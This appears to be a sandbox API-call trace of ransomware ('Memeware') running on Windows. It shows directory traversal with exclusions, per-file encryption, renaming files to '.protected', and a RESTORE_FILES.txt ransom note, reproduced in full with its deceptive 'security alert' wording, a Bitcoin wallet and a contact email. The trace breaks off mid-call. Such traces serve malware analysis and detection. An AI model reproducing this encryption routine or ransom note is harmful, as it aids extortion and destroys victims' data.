1 [0089.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.226] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.226] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.226] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.226] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.226] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.226] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.226] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\..") returned 90 [0089.226] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.226] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.226] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.226] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.226] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.226] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.226] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.226] lstrcmpiW (lpString1="36USA68T", lpString2="Windows") returned -1 [0089.226] lstrcmpiW (lpString1="36USA68T", lpString2="Program Files") returned -1 [0089.226] lstrcmpiW (lpString1="36USA68T", lpString2="Program Files (x86)") returned -1 [0089.226] lstrcmpiW (lpString1="36USA68T", lpString2="$Recycle.bin") returned 1 [0089.226] lstrcmpiW (lpString1="36USA68T", lpString2="System Volume Information") returned -1 [0089.226] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T") returned 96 [0089.226] lstrcmpW (lpString1="36USA68T", lpString2=".") returned 1 [0089.226] lstrcmpW (lpString1="36USA68T", lpString2="..") returned 1 [0089.227] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*") returned 98 [0089.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.227] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.227] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.227] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.227] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.227] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.227] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\.") returned 98 [0089.227] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.227] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.227] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.227] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.227] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.227] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.227] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.227] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.227] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.227] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.228] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.228] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\..") returned 99 [0089.228] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.228] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.228] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.228] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.228] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.228] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.228] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.228] lstrcmpiW (lpString1="imagesrv.adition[1].xml", lpString2="Windows") returned -1 [0089.228] lstrcmpiW (lpString1="imagesrv.adition[1].xml", lpString2="Program Files") returned -1 [0089.228] lstrcmpiW (lpString1="imagesrv.adition[1].xml", lpString2="Program Files (x86)") returned -1 [0089.228] lstrcmpiW (lpString1="imagesrv.adition[1].xml", lpString2="$Recycle.bin") returned 1 [0089.228] lstrcmpiW (lpString1="imagesrv.adition[1].xml", lpString2="System Volume Information") returned -1 [0089.228] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned 120 [0089.228] StrStrIW (lpFirst="imagesrv.adition[1].xml", lpSrch=".protected") returned 0x0 [0089.228] lstrcmpW (lpString1="imagesrv.adition[1].xml", lpString2="RESTORE_FILES.txt") returned -1 [0089.228] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.228] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned 120 [0089.229] StrStrW (lpFirst="imagesrv.adition[1].xml", lpSrch=".txt") returned 0x0 [0089.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned 120 [0089.229] StrStrW (lpFirst="imagesrv.adition[1].xml", lpSrch=".rar") returned 0x0 [0089.229] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned 120 [0089.229] StrStrW (lpFirst="imagesrv.adition[1].xml", lpSrch=".zip") returned 0x0 [0089.229] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xd, lpOverlapped=0x0) returned 1 [0089.230] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffff3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.230] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xd, lpOverlapped=0x0) returned 1 [0089.230] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.230] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.230] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.230] CloseHandle (hObject=0x154) returned 1 [0089.231] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.protected") returned 130 [0089.231] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.protected")) returned 1 [0089.231] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.231] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.231] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\RESTORE_FILES.txt") returned 114 [0089.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.232] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.232] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.233] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.233] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.233] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.233] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.233] CloseHandle (hObject=0x150) returned 1 [0089.233] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.233] lstrcmpiW (lpString1="3O75JDME", lpString2="Windows") returned -1 [0089.233] lstrcmpiW (lpString1="3O75JDME", lpString2="Program Files") returned -1 [0089.233] lstrcmpiW (lpString1="3O75JDME", lpString2="Program Files (x86)") returned -1 [0089.233] lstrcmpiW (lpString1="3O75JDME", lpString2="$Recycle.bin") returned 1 [0089.233] lstrcmpiW (lpString1="3O75JDME", lpString2="System Volume Information") returned -1 [0089.233] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME") returned 96 [0089.233] lstrcmpW (lpString1="3O75JDME", lpString2=".") returned 1 [0089.234] lstrcmpW (lpString1="3O75JDME", lpString2="..") returned 1 [0089.234] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*") returned 98 [0089.234] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.234] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.234] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.234] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.234] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.234] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.234] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\.") returned 98 [0089.234] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.234] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.234] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.234] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.234] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.235] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.235] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.235] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.235] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.235] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.235] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.235] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\..") returned 99 [0089.235] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.235] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.235] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.235] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.235] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.235] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.235] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.235] lstrcmpiW (lpString1="www.google[1].xml", lpString2="Windows") returned 1 [0089.235] lstrcmpiW (lpString1="www.google[1].xml", lpString2="Program Files") returned 1 [0089.235] lstrcmpiW (lpString1="www.google[1].xml", lpString2="Program Files (x86)") returned 1 [0089.235] lstrcmpiW (lpString1="www.google[1].xml", lpString2="$Recycle.bin") returned 1 [0089.235] lstrcmpiW (lpString1="www.google[1].xml", lpString2="System Volume Information") returned 1 [0089.235] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned 114 [0089.235] StrStrIW (lpFirst="www.google[1].xml", lpSrch=".protected") returned 0x0 [0089.235] lstrcmpW (lpString1="www.google[1].xml", lpString2="RESTORE_FILES.txt") returned 1 [0089.235] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.235] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned 114 [0089.236] StrStrW (lpFirst="www.google[1].xml", lpSrch=".txt") returned 0x0 [0089.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned 114 [0089.236] StrStrW (lpFirst="www.google[1].xml", lpSrch=".rar") returned 0x0 [0089.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned 114 [0089.236] StrStrW (lpFirst="www.google[1].xml", lpSrch=".zip") returned 0x0 [0089.236] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xd, lpOverlapped=0x0) returned 1 [0089.237] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffff3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.237] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xd, lpOverlapped=0x0) returned 1 [0089.237] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.237] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.237] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.237] CloseHandle (hObject=0x154) returned 1 [0089.237] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.protected") returned 124 [0089.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.protected")) returned 1 [0089.239] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.239] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.239] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet 